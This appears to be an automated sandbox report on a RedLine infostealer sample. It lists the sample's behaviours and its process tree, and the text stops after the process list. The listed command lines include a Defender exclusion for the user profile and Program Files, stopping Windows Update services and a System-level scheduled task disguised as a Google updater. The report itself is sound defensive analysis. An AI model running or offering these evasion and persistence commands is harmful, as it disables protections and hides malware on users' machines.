Malware Analysis Report

2025-01-18 08:04

Sample ID 230810-w12ccagd43
Target 113c295681410c02517b52bd6aba932e.exe
SHA256 fd64ca492cd7181e02bebe0d9b3b1c5616af08c7c1e1a7cc4e22ab41246c3995
Tags
redline logsdiller cloud (tg: @logsdillabot) evasion infostealer spyware stealer themida
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

fd64ca492cd7181e02bebe0d9b3b1c5616af08c7c1e1a7cc4e22ab41246c3995

Threat Level: Known bad

The file 113c295681410c02517b52bd6aba932e.exe was found to be: Known bad.

Malicious Activity Summary

redline logsdiller cloud (tg: @logsdillabot) evasion infostealer spyware stealer themida

RedLine

Suspicious use of NtCreateUserProcessOtherParentProcess

Downloads MZ/PE file

Stops running service(s)

Drops file in Drivers directory

Executes dropped EXE

Loads dropped DLL

Themida packer

Reads user/profile data of web browsers

Accesses cryptocurrency files/wallets, possible credential harvesting

Drops file in System32 directory

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Launches sc.exe

Drops file in Program Files directory

Program crash

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Modifies system certificate store

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-10 18:24

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-10 18:24

Reported

2023-08-10 18:26

Platform

win7-20230712-en

Max time kernel

108s

Max time network

150s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Windows\Temp\setup.exe N/A

Stops running service(s)

evasion

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2180 set thread context of 1916 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Windows\Temp\setup.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\cli.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c0329419b8cbd901 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\113c295681410c02517b52bd6aba932e.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\113c295681410c02517b52bd6aba932e.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\113c295681410c02517b52bd6aba932e.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\113c295681410c02517b52bd6aba932e.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\113c295681410c02517b52bd6aba932e.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\113c295681410c02517b52bd6aba932e.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\113c295681410c02517b52bd6aba932e.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2636 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\113c295681410c02517b52bd6aba932e.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 2636 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\113c295681410c02517b52bd6aba932e.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 2636 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\113c295681410c02517b52bd6aba932e.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 2636 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\113c295681410c02517b52bd6aba932e.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 2888 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 2888 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 2888 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 2888 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 2636 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\113c295681410c02517b52bd6aba932e.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2636 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\113c295681410c02517b52bd6aba932e.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2636 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\113c295681410c02517b52bd6aba932e.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2636 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\113c295681410c02517b52bd6aba932e.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2180 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2180 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2180 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2180 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2180 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2180 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2180 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2180 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2180 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2180 wrote to memory of 936 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 2180 wrote to memory of 936 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 2180 wrote to memory of 936 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 2180 wrote to memory of 936 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 2872 wrote to memory of 2780 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2872 wrote to memory of 2780 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2872 wrote to memory of 2780 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2872 wrote to memory of 2256 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2872 wrote to memory of 2256 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2872 wrote to memory of 2256 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2872 wrote to memory of 436 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2872 wrote to memory of 436 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2872 wrote to memory of 436 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2760 wrote to memory of 1192 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 2760 wrote to memory of 1192 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 2760 wrote to memory of 1192 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 2872 wrote to memory of 828 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2872 wrote to memory of 828 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2872 wrote to memory of 828 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2984 wrote to memory of 2608 N/A C:\Windows\system32\taskeng.exe C:\Program Files\Google\Chrome\updater.exe
PID 2984 wrote to memory of 2608 N/A C:\Windows\system32\taskeng.exe C:\Program Files\Google\Chrome\updater.exe
PID 2984 wrote to memory of 2608 N/A C:\Windows\system32\taskeng.exe C:\Program Files\Google\Chrome\updater.exe
PID 2636 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\113c295681410c02517b52bd6aba932e.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 2636 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\113c295681410c02517b52bd6aba932e.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 2636 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\113c295681410c02517b52bd6aba932e.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 2636 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\113c295681410c02517b52bd6aba932e.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 2600 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2600 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2600 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2600 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1724 wrote to memory of 484 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1724 wrote to memory of 484 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1724 wrote to memory of 484 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1724 wrote to memory of 2420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1724 wrote to memory of 2420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1724 wrote to memory of 2420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1724 wrote to memory of 2420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1724 wrote to memory of 2420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1724 wrote to memory of 2420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1724 wrote to memory of 2420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1724 wrote to memory of 2420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1724 wrote to memory of 2420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1724 wrote to memory of 2420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\113c295681410c02517b52bd6aba932e.exe

"C:\Users\Admin\AppData\Local\Temp\113c295681410c02517b52bd6aba932e.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

